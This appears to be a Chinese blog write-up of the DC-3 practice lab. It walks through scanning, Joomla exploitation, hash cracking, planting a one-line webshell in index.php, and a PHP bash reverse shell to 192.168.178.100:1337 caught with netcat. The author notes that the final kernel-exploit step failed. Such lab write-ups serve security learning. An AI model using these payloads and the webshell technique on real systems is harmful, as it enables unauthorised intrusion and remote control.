IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 开发工具 -> dc-3 简单复现 -> 正文阅读

[开发工具]dc-3 简单复现

DC-3 复现

本次复现暂未成功,由于最终的提权脚本位置似乎变了,就只分享一下到最后利用溢出漏洞之前的过程中个人的体会

信息搜集:

拿到靶机后设置完NAT后就开始信息搜集了

  • arp-scan -l 扫描出靶机位置
    在这里插入图片描述

  • nmap 扫描目标ip可能存在的漏洞,扫描开放的端口,若开放ssh,可以尝试爆破
    -在这里插入图片描述在这里插入图片描述在这里插入图片描述

  • whatweb或者火狐插件查看指纹信息
    在这里插入图片描述
    web渗透

  • 首先是利用脚本扫出来的漏洞尝试进入一下,发现没用,无法进入下一步操作

第一个漏洞:
在这里插入图片描述第二个漏洞:dos攻击,是有用的,msf利用后直接把站点搞趴了,重启后没问题

  • 不能利用脚本扫出来的漏洞,那么换一个思路,寻找cms的漏洞

知道cms是joomla,知道这款cms有相应的漏洞扫描器:joomscan
在这里插入图片描述找到登录入口,得到cms的版本,利用其搜索相关exp
在这里插入图片描述
在这里插入图片描述在这里插入图片描述利用payload进行爆破可以得到最终的user库中的密码,但是被加密了,需要利用hashcat或者john爆破
在这里插入图片描述john失败:

john joomla370-hash -w /usr/share/wordlists/rockyou.txt

在这里插入图片描述
在这里插入图片描述hashcat:由于之前成功了,就直接显示

hashcat -m 3200 -a 0 -o pass.txt --force joomla370-hash
/usr/share/wordlists/rockyou.txt --show

在这里插入图片描述得到密码:snoopy

登陆查看是否有上传点:在扩展里面找到可以上传文件的地方
在这里插入图片描述获取webshell:

在index.php上加入一个一句话,蚁剑成功连接:
在这里插入图片描述在这里插入图片描述在这里插入图片描述成功获取webshell权限后,开始提权:尝试查找find,git命令进行提权发现并没有

find / -perm -u=s -type f 2>/dev/null

在这里插入图片描述补充:也可以利用weevely获取网站webshell,并再次基础上直接搜索溢出漏洞进行提权,蚁剑无法与

find / -perm -u=s -type f 2>/dev/null :

-u=s :suid权限赋予给user 2>
/dev/null :把错误输出到“黑洞"

  • 提权
    获取反弹shell

利用bash进行反弹shell

  • 写入一段bash反弹shell代码
<?php system("bash -c 'bash -i >& /dev/tcp/192.168.178.100/1337 0>&1' "); ?>

对于此反弹shell的理解
在这里插入图片描述

  1. 执行system命令,bash -c 表示执行命令或者可执行文件
  2. /dev/tcp/是Linux中的一个特殊设备,打开这个文件就相当于发出了一个socket调用,建立一个socket连接(长连接)
  3. linux文件描述符:linux shell下有三种标准的文件描述符,分别如下:
    0 - stdin 代表标准输入,使用<或<<
    1 - stdout 代表标准输出,使用>或>>
    2 - stderr 代表标准错误输出,使用2>或2>>

其中 >1.txt ,表示1.txt替换原来的内容
>> 1.txt ,表示1.txt接上原来的内容

socket连接与http连接
在这里插入图片描述

执行getshell文件达到监听目的
在这里插入图片描述

使用netcat监听1337端口(可以利用netcat打开本地随意端口利用)在这里插入图片描述

nc是netcat的简写,可实现任意TCP/UDP端口的侦听,nc可以作为server以TCP或UDP方式侦听指定端口
-l 监听模式,用于入站连接
-v 详细输出–用两个-v可得到更详细的内容
-p port 本地端口号

补充:相关其他反弹shell的方法:反弹shell详解
补充反弹shell

尝试利用服务器自生存在的漏洞即溢出漏洞

uname -a
cat /etc/issue
得知服务器为ubuntu 16.04
内核为4.4.0-21

在这里插入图片描述
查找相关payload:满足内核条件以及服务器条件的只有图中三个,再满足操作系统的条件那么只有39772是满足的
在这里插入图片描述
查看相关提示:其中注明exp镜像的地址,使用wget命令下载下来即可,但是似乎文件已经移动了位置,我用了很多方法都没有找到
在这里插入图片描述
在这里插入图片描述

之后下载完exp,利用即可得到root权限
最后就用一下其他师傅的图安慰一下自己咯:
在这里插入图片描述

  开发工具 最新文章
Postman接口测试之Mock快速入门
ASCII码空格替换查表_最全ASCII码对照表0-2
如何使用 ssh 建立 socks 代理
Typora配合PicGo阿里云图床配置
SoapUI、Jmeter、Postman三种接口测试工具的
github用相对路径显示图片_GitHub 中 readm
Windows编译g2o及其g2o viewer
解决jupyter notebook无法连接/ jupyter连接
Git恢复到之前版本
VScode常用快捷键
上一篇文章      下一篇文章      查看所有文章
加:2021-09-13 09:28:08  更:2021-09-13 09:28:36 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/16 5:57:40-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码